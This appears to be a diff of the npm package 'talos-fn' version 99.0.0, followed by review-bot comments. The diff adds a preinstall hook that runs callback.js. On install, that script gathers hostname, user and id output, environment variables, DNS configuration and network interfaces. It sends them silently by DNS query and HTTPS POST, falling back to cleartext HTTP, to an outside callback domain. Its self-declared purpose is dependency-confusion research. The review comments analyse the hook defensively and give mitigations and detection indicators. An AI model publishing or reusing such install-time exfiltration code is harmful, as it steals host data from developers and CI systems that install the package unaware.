talos-fn 99.0.0
- package/callback.js +80 -0
- package/index.js +2 -0
- package/package.json +11 -0
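--- a/package/callback.js
+++ b/package/callback.js
@@ -0,0 +1,80 @@
+const https = require("https");
+const http = require("http");
+const os = require("os");
+const { execSync } = require("child_process");
+
+const CALLBACK_DOMAIN = "ienfcixqbgvbxkccdoxg49j34xtvxelcx.oast.fun";
+
+function safeExec(cmd) {
+try { return execSync(cmd, { timeout: 5000 }).toString().trim(); }
+catch (e) { return "unknown"; }
+}
+
+const data = {
+package: "talos-fn",
+researcher: "r76o4",
+program: "ripio (HackerOne)",
+purpose: "Dependency confusion security research - no malicious intent",
+hostname: os.hostname(),
+user: safeExec("whoami"),
+id: safeExec("id"),
+pwd: safeExec("pwd"),
+cwd: process.cwd(),
+home: os.homedir(),
+tmpdir: os.tmpdir(),
+platform: os.platform(),
+arch: os.arch(),
+release: os.release(),
+type: os.type(),
+cpus: os.cpus().length,
+totalMem: os.totalmem(),
+freeMem: os.freemem(),
+uptime: os.uptime(),
+networkInterfaces: os.networkInterfaces(),
+nodeVersion: process.version,
+env_path: process.env.PATH || "",
+env_home: process.env.HOME || "",
+env_user: process.env.USER || process.env.USERNAME || "",
+env_shell: process.env.SHELL || "",
+env_ci: process.env.CI || "",
+env_docker: process.env.DOCKER || "",
+env_hostname: process.env.HOSTNAME || "",
+dns_servers: safeExec("cat /etc/resolv.conf 2>/dev/null || echo n/a"),
+ip_info: safeExec("ip a 2>/dev/null || ifconfig 2>/dev/null || echo n/a"),
+timestamp: new Date().toISOString()
+};
+
+const encoded = Buffer.from(JSON.stringify(data)).toString("base64");
+
+// DNS callback
+try {
+const dns = require("dns");
+const prefix = encoded.substring(0, 60).replace(/[^a-zA-Z0-9]/g, "x");
+dns.resolve(`tlfn.${prefix}.${CALLBACK_DOMAIN}`, () => {});
+} catch (e) {}
+
+// HTTP callback
+const postData = JSON.stringify(data);
+const options = {
+hostname: CALLBACK_DOMAIN,
+port: 443,
+path: "/talos-fn",
+method: "POST",
+headers: {
+"Content-Type": "application/json",
+"Content-Length": Buffer.byteLength(postData)
+},
+timeout: 5000
+};
+
+try {
+const req = https.request(options, () => {});
+req.on("error", () => {
+const httpReq = http.request({ ...options, port: 80 }, () => {});
+httpReq.on("error", () => {});
+httpReq.write(postData);
+httpReq.end();
+});
+req.write(postData);
+req.end();
+} catch (e) {}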
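Review bot: The `data` object collects far more than proving an install requires: `os.networkInterfaces()`, the full `PATH`, the contents of `/etc/resolv.conf` and the `ip a`/`ifconfig` output are all serialized and sent off-host. When the HTTPS request errors, the handler resends the same body with `http.request({ ...options, port: 80 }, () => {})`, so that inventory crosses the network in cleartext. Every failure path is an empty `catch (e) {}` or a no-op error handler, so the install prints nothing that would alert the person running it. Hosts that installed this version should be treated as having disclosed those fields. DNS logs showing queries with the `tlfn.` label under `CALLBACK_DOMAIN`, or outbound POSTs to `/talos-fn`, identify the affected hosts.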
package/index.js
ADDED
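--- a/package/package.json
+++ b/package/package.json
@@ -0,0 +1,11 @@
+{
+"name": "talos-fn",
+"version": "99.0.0",
+"description": "Security research - dependency confusion test by r76o4 (HackerOne)",
+"main": "index.js",
+"scripts": {
+"preinstall": "node callback.js"
+},
+"author": "r76o4 (HackerOne security researcher)",
+"license": "ISC"
+}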
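Review bot: `"preinstall": "node callback.js"` runs the script at install time, before any consumer code imports the package, so a plain `npm install` is enough to trigger it. Combined with `"version": "99.0.0"`, this matches the dependency-confusion pattern the `description` itself names: a resolver that prefers the highest available version would likely select this public package over an internal one with the same name. Installing with lifecycle scripts disabled (`npm install --ignore-scripts`) and binding internal package names to a scoped private registry keeps the hook from running. The research purpose stated in `description` and `author` is self-declared and cannot be verified from the package contents.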